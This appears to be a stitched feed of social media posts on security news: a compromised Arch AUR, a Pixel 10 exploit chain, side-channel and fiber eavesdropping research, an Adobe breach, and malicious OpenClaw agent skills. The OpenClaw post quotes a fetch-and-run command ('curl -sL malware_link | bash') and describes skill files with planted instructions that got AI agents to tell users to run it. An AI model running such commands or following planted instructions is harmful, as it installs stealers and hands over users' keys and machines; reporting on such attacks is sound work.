🚨 BREAKING: More than 400 Arch Linux User Repository packages have been compromised with infostealer malware and a rootkit.
Attacker posed as a trusted maintainer and "adopted" orphaned packages.
Arch maintainers are purging infected packages now. Audit your AUR installs.
🚨 Google Project Zero just published a Pixel 10 zero-click to root exploit chain.
Two vulnerabilities and less than a day of work to weaponize the second one.
Chain:
- Stage 1: same Dolby UDC zero-click (CVE-2025-54957) used against the Pixel 9. Patched in January 2026. Only minor offset updates and a tweak around RET PAC needed to port to Pixel 10
- Stage 2: a brand new local privilege escalation in the VPU driver for the Chips&Media Wave677DV on the Tensor G5
Result: arbitrary kernel read/write in 5 lines of code. Full exploit written in under a day.
The RF world is insane.
Researchers recovered AES-128 keys from a Bluetooth chip by listening to its own antenna from 10 meters away.
Crypto-engine switching noise couples into the RF chain, rides the 2.4 GHz carrier, and leaks out as radio.
A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://t.co/3qfJMziXVd
🚨 BREAKING: Your internet fiber cable is secretly listening to you right now.
Researchers from hong kong just dropped a paper at NDSS 2026 showing how they can spy on your conversations through the fiber optics in your walls.
They successfully turned ordinary Fiber-to-the-Home (FTTH) cables into hidden, long-range microphones.
No laser bugs. No physical implants. No drilling through walls.
Just the broadband cable that is already sitting in your living room or office.
By connecting a commercially available Distributed Acoustic Sensing (DAS) system to one end of the fiber, they can measure microscopic vibrations caused by sound waves in the room.
Then, they use AI to reconstruct those vibrations into crystal-clear speech.
Through walls. From adjacent rooms. From up to 50 meters away.
It was tested on actually deployed infrastructure.
The attack cost is dropping. Commercial gear is all that is required if an attacker has access to the other end of the fiber connection.
Millions of homes and offices have FTTH installed. And every single one is potentially exposed.
🚨‼️ BREAKING: Adobe has been breached by threat actor Mr. Raccoon, leaking 13 million support tickets with personal data, 15,000 employee records, all HackerOne submissions, internal documents and more.
Mr. Raccoon gained access through an Indian BPO, first deploying a remote access tool on an employee, then phishing their manager.
Mr. Raccoon told us: "They allowed you to export all tickets in one request from an agent."
Sources: Amazon's AI tools caused at least two AWS outages, including a 13-hour disruption in December after its Kiro AI deleted and recreated an environment (@rafeuddin_ / Financial Times)
https://t.co/flaswxaVPI
https://t.co/ha3bb3NYCr
📥 Send tips! https://t.co/KoagBA7xxP
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attackers server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life
.@SIGKITTEN is running LLM agent battle royales ("Clanker Games"): identical vulnerable Docker containers where agents compete to pwn & kill each other (PID 1) in real time. Latest runs show Gemini crushing it by scanning its own container first. https://t.co/0DebMCyTqs
Lmeow, realized this morning that @0xParticle, one of our applied cryptographers, spent the last year writing a full Zero-Knowledge Proofs book in his spare time.
If you’re into ZK, this is genuinely worth reading.
Yes, this is the kind of people you work with at @Wonderland.
We hacked the AWS JavaScript SDK, a core library powering the entire @AWScloud ecosystem - including the AWS Console itself 🤯
How did we do it? Just two missing characters was all it took.
This is the story of #CodeBreach 🧵👇
As a crypto CTO, I’m tired of seeing sloppy practices that cost millions.
I came from the army, where mistakes cost lives. I brought that same discipline into crypto.
If you manage user funds and you’re not doing what’s below, act now.
These are the non-negotiables 👇
Last night my wife asked me to install a “cute little npm package” she found on GitHub.
I checked the code.
No lockfile. No 2FA. Seven maintainers with anime avatars. Last commit was “pls work” from 2019. Published from a username that looked like a WiFi password.
The package had 57 transitive dependencies maintained by 119 people and 3 nation-state adversaries.
One dependency pulled in a prebuilt binary from a phpBB forum hosted on the dark web.
Another tried to contact an IP that belongs to a guy named “Big Ron.”
She said “babe it’s fine.”
I said “that’s what people say right before a supply chain incident.”
She went to bed annoyed.
I went to bed with a clean SBOM.
We all make choices.
The FFMPEG stuff is pretty crazy because it's a tiny poorly funded Open Source project which underpins basically every large, multi-million dollar or billion dollar video based company, all of which contribute very little except "urgent" bug reports. Literally XKCD 2347.
Arguably the most brilliant engineer in FFmpeg left because of this. He reverse engineered dozens of codecs by hand as a volunteer.
Then security "researchers" and corporate employees came along repeatedly insisted "critical" security issues were fixed immediately waving their CVEs.
This was hugely demotivating to the fun and enjoyment of reverse engineering.